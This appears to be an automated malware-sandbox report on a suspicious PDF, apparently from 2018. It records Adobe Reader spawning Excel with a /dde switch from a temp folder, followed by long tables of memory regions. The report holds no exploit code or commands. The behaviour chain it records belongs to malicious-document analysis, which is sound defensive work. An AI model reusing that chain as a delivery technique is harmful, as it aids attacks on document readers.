2c5729e17b64cd4e905ccfeabbc913ed945e17625c35ec1d6932194aae83d7c6 (SHA256)
DOC_443353149786_10082018.pdf
PDF Document
Created at 2018-08-10 12:36:00
Notifications (2/2)
The overall sleep time of all monitored processes was truncated from "20 minutes, 15 seconds" to "2 minutes" to reveal dormant functionality.
The operating system was rebooted during the analysis.
Monitored Processes
Behavior Information - Sequential View
Process #1: acrord32.exe
0
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\adobe\reader 8.0.0\reader\acrord32.exe |
| Command Line | "C:\Program Files\Adobe\Reader 8.0.0\Reader\AcroRd32.exe" |
| Initial Working Directory | C:\Users\BMe1N39jU1 6criBQ\Desktop\ |
| Monitor | Start Time: 00:00:19, Reason: Analysis Target |
| Unmonitor | End Time: 00:01:52, Reason: Self Terminated |
| Monitor Duration | 00:01:33 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x904 |
| Parent PID | 0x5fc (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | O5ZINUQXJZK\BMe1N39jU1 6criBQ |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
91C
0x
918
0x
914
0x
910
0x
90C
0x
908
0x
940
0x
944
0x
978
0x
9A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00142fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x00287fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| acrord32.exe | 0x00400000 | 0x00452fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x0116ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001170000 | 0x01170000 | 0x01170fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001180000 | 0x01180000 | 0x01181fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001190000 | 0x01190000 | 0x0120ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001210000 | 0x01210000 | 0x0130ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001310000 | 0x01310000 | 0x01311fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001320000 | 0x01320000 | 0x0132ffff | Private Memory | rw |
|
|
|
- |
| acrord32.dll | 0x01330000 | 0x0202ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000002030000 | 0x02030000 | 0x0210efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002110000 | 0x02110000 | 0x02110fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002120000 | 0x02120000 | 0x02120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002130000 | 0x02130000 | 0x02136fff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x02140000 | 0x0215ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002160000 | 0x02160000 | 0x02160fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002170000 | 0x02170000 | 0x02171fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002180000 | 0x02180000 | 0x02180fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002190000 | 0x02190000 | 0x02190fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000021a0000 | 0x021a0000 | 0x021a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000021b0000 | 0x021b0000 | 0x021b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000021c0000 | 0x021c0000 | 0x021fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02200000 | 0x024cefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000024d0000 | 0x024d0000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025d0000 | 0x025d0000 | 0x027cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027d0000 | 0x027d0000 | 0x027d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000027e0000 | 0x027e0000 | 0x027e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x0282ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x0292ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002930000 | 0x02930000 | 0x02d22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002d30000 | 0x02d30000 | 0x02e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f30000 | 0x02f30000 | 0x0302ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x03030000 | 0x0395ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000003960000 | 0x03960000 | 0x03960fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003970000 | 0x03970000 | 0x03970fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003980000 | 0x03980000 | 0x03980fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003990000 | 0x03990000 | 0x03990fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000039a0000 | 0x039a0000 | 0x039a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000039b0000 | 0x039b0000 | 0x039b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000039c0000 | 0x039c0000 | 0x039c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000039d0000 | 0x039d0000 | 0x039d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000039e0000 | 0x039e0000 | 0x039e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000039f0000 | 0x039f0000 | 0x039f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003a00000 | 0x03a00000 | 0x03a00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003a10000 | 0x03a10000 | 0x03a10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003a20000 | 0x03a20000 | 0x03a20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003a30000 | 0x03a30000 | 0x03a30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003a40000 | 0x03a40000 | 0x03a40fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003a50000 | 0x03a50000 | 0x03a50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003a60000 | 0x03a60000 | 0x03a60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003a70000 | 0x03a70000 | 0x03a70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003a80000 | 0x03a80000 | 0x03a80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003a90000 | 0x03a90000 | 0x03e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003e90000 | 0x03e90000 | 0x0468ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x046affff | Private Memory | rw |
|
|
|
- |
| msctf.dll.mui | 0x046b0000 | 0x046b0fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000046c0000 | 0x046c0000 | 0x046c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000046d0000 | 0x046d0000 | 0x046d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000046e0000 | 0x046e0000 | 0x046e0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004700000 | 0x04700000 | 0x04700fff | Private Memory | rw |
|
|
|
- |
| ace.dll | 0x05000000 | 0x050a8fff | Memory Mapped File | rwx |
|
|
|
- |
| agm.dll | 0x06000000 | 0x064b0fff | Memory Mapped File | rwx |
|
|
|
- |
| bib.dll | 0x07000000 | 0x07019fff | Memory Mapped File | rwx |
|
|
|
- |
| cooltype.dll | 0x08000000 | 0x08239fff | Memory Mapped File | rwx |
|
|
|
- |
| acroform.api | 0x20800000 | 0x20fdafff | Memory Mapped File | rwx |
|
|
|
- |
| annots.api | 0x22100000 | 0x224f2fff | Memory Mapped File | rwx |
|
|
|
- |
| digsig.api | 0x23000000 | 0x2311afff | Memory Mapped File | rwx |
|
|
|
- |
| escript.api | 0x23800000 | 0x23951fff | Memory Mapped File | rwx |
|
|
|
- |
| ewh32.api | 0x24000000 | 0x24023fff | Memory Mapped File | rwx |
|
|
|
- |
| ia32.api | 0x25800000 | 0x25817fff | Memory Mapped File | rwx |
|
|
|
- |
| ebook.api | 0x26800000 | 0x2680ffff | Memory Mapped File | rwx |
|
|
|
- |
| ppklite.api | 0x28000000 | 0x285d1fff | Memory Mapped File | rwx |
|
|
|
- |
| reflow.api | 0x28800000 | 0x2885dfff | Memory Mapped File | rwx |
|
|
|
- |
| makeaccessible.api | 0x29000000 | 0x29227fff | Memory Mapped File | rwx |
|
|
|
- |
| accessibility.api | 0x29800000 | 0x2985afff | Memory Mapped File | rwx |
|
|
|
- |
| readoutloud.api | 0x29a00000 | 0x29a1dfff | Memory Mapped File | rwx |
|
|
|
- |
| search5.api | 0x2a000000 | 0x2a018fff | Memory Mapped File | rwx |
|
|
|
- |
| search.api | 0x2a300000 | 0x2a359fff | Memory Mapped File | rwx |
|
|
|
- |
| sendmail.api | 0x2a800000 | 0x2a821fff | Memory Mapped File | rwx |
|
|
|
- |
| spelling.api | 0x2b000000 | 0x2b045fff | Memory Mapped File | rwx |
|
|
|
- |
| pddom.api | 0x2b800000 | 0x2b865fff | Memory Mapped File | rwx |
|
|
|
- |
| multimedia.api | 0x2d800000 | 0x2d94efff | Memory Mapped File | rwx |
|
|
|
- |
| weblink.api | 0x2e000000 | 0x2e02ffff | Memory Mapped File | rwx |
|
|
|
- |
| updater.api | 0x30800000 | 0x30829fff | Memory Mapped File | rwx |
|
|
|
- |
| hls.api | 0x31800000 | 0x31810fff | Memory Mapped File | rwx |
|
|
|
- |
| saveasrtf.api | 0x32000000 | 0x3204dfff | Memory Mapped File | rwx |
|
|
|
- |
| dva.api | 0x40800000 | 0x40821fff | Memory Mapped File | rwx |
|
|
|
- |
| checkers.api | 0x45800000 | 0x458cffff | Memory Mapped File | rwx |
|
|
|
- |
| imageviewer.api | 0x46800000 | 0x46873fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x6d670000 | 0x6d70afff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp80.dll | 0x6d710000 | 0x6d796fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x6eac0000 | 0x6eaf1fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x73780000 | 0x73792fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x73ac0000 | 0x73afffff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74300000 | 0x74320fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74330000 | 0x74424fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74470000 | 0x7460dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x749e0000 | 0x749e8fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74d00000 | 0x74d3afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74f60000 | 0x74f75fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x753e0000 | 0x753ebfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75480000 | 0x7548dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75630000 | 0x75679fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75680000 | 0x75691fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x756a0000 | 0x756c6fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75790000 | 0x757e6fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75800000 | 0x75809fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75810000 | 0x758b0fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75a00000 | 0x75ac8fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75ad0000 | 0x75aeefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75b50000 | 0x75b9dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75ba0000 | 0x75c73fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75c80000 | 0x75d02fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75d10000 | 0x75dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75dc0000 | 0x75e04fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e10000 | 0x75e28fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e30000 | 0x75efbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75f40000 | 0x76b89fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76d90000 | 0x76eebfff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x76ef0000 | 0x76f8cfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x77090000 | 0x7722cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x772b0000 | 0x7733efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77340000 | 0x7747bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x774d0000 | 0x7756ffff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77580000 | 0x77580fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 28 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #2: excel.exe
0
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\progra~1\micros~1\office14\excel.exe |
| Command Line | "C:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE" /dde |
| Initial Working Directory | C:\Users\BME1N3~1\AppData\Local\Temp\Acr650A.tmp\ |
| Monitor | Start Time: 00:00:28, Reason: Child Process |
| Unmonitor | End Time: 00:00:55, Reason: Self Terminated |
| Monitor Duration | 00:00:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x948 |
| Parent PID | 0x904 (c:\program files\adobe\reader 8.0.0\reader\acrord32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | O5ZINUQXJZK\BMe1N39jU1 6criBQ |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
94C
0x
950
0x
954
0x
958
0x
95C
0x
960
0x
964
0x
968
0x
96C
0x
97C
0x
980
0x
984
0x
98C
0x
994
0x
998
0x
A40
0x
A44
0x
A48
0x
A4C
0x
A50
0x
A54
0x
A58
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00022fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00103fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00127fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0015ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00337fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00341fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | - |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x005e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x011effff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000011f0000 | 0x011f0000 | 0x011fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0120ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001210000 | 0x01210000 | 0x0121ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001220000 | 0x01220000 | 0x0122ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001230000 | 0x01230000 | 0x0123ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001240000 | 0x01240000 | 0x0124ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001250000 | 0x01250000 | 0x0125ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001260000 | 0x01260000 | 0x01261fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001270000 | 0x01270000 | 0x0127ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001280000 | 0x01280000 | 0x0128ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001290000 | 0x01290000 | 0x01290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012a0000 | 0x012a0000 | 0x012a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012b0000 | 0x012b0000 | 0x012b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012c0000 | 0x012c0000 | 0x012c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012d0000 | 0x012d0000 | 0x012dcfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012e0000 | 0x012e0000 | 0x012e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012f0000 | 0x012f0000 | 0x012fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001300000 | 0x01300000 | 0x0130bfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001310000 | 0x01310000 | 0x0131ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001320000 | 0x01320000 | 0x0135ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001360000 | 0x01360000 | 0x0136ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001370000 | 0x01370000 | 0x01370fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001380000 | 0x01380000 | 0x0138ffff | Private Memory | rw |
|
|
|
- |
| xlintl32.dll | 0x01390000 | 0x015c1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000015d0000 | 0x015d0000 | 0x016aefff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x016b0000 | 0x0197efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001980000 | 0x01980000 | 0x0199ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000019a0000 | 0x019a0000 | 0x019a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000019b0000 | 0x019b0000 | 0x019b0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000019c0000 | 0x019c0000 | 0x019c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000019d0000 | 0x019d0000 | 0x019d7fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000019e0000 | 0x019e0000 | 0x019e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000019f0000 | 0x019f0000 | 0x019f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a00000 | 0x01a00000 | 0x01a3ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x01a40000 | 0x0236ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x02413fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002420000 | 0x02420000 | 0x02423fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x0243ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x0244ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002450000 | 0x02450000 | 0x0245ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002460000 | 0x02460000 | 0x0246ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002470000 | 0x02470000 | 0x0247ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002480000 | 0x02480000 | 0x0248ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x0249ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x024dffff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000024e0000 | 0x024e0000 | 0x024effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x025effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025f0000 | 0x025f0000 | 0x0272bfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002730000 | 0x02730000 | 0x0282ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x02830fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002840000 | 0x02840000 | 0x028bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x028fffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000002900000 | 0x02900000 | 0x02906fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002910000 | 0x02910000 | 0x02911fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002920000 | 0x02920000 | 0x02920fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x0293ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002940000 | 0x02940000 | 0x0294ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002950000 | 0x02950000 | 0x0295ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002960000 | 0x02960000 | 0x0296ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002970000 | 0x02970000 | 0x0297ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002980000 | 0x02980000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x0299ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x029dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029e0000 | 0x029e0000 | 0x029effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029f0000 | 0x029f0000 | 0x029fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a00000 | 0x02a00000 | 0x02a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a10000 | 0x02a10000 | 0x02a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002aa0000 | 0x02aa0000 | 0x02b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bb0000 | 0x02bb0000 | 0x02bbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002bc0000 | 0x02bc0000 | 0x033bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000034a0000 | 0x034a0000 | 0x0359ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000036a0000 | 0x036a0000 | 0x0379ffff | Private Memory | rw |
|
|
|
- |
| excel.exe | 0x2fca0000 | 0x31070fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000004fff0000 | 0x4fff0000 | 0x4fffffff | Private Memory | rwx |
|
|
|
- |
| msores.dll | 0x66650000 | 0x6ab79fff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x6ab80000 | 0x6ade2fff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x6adf0000 | 0x6bfd9fff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x6bfe0000 | 0x6d373fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x6d520000 | 0x6d66efff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x6ec50000 | 0x6ee8ffff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x6f690000 | 0x6f709fff | Memory Mapped File | rwx |
|
|
|
- |
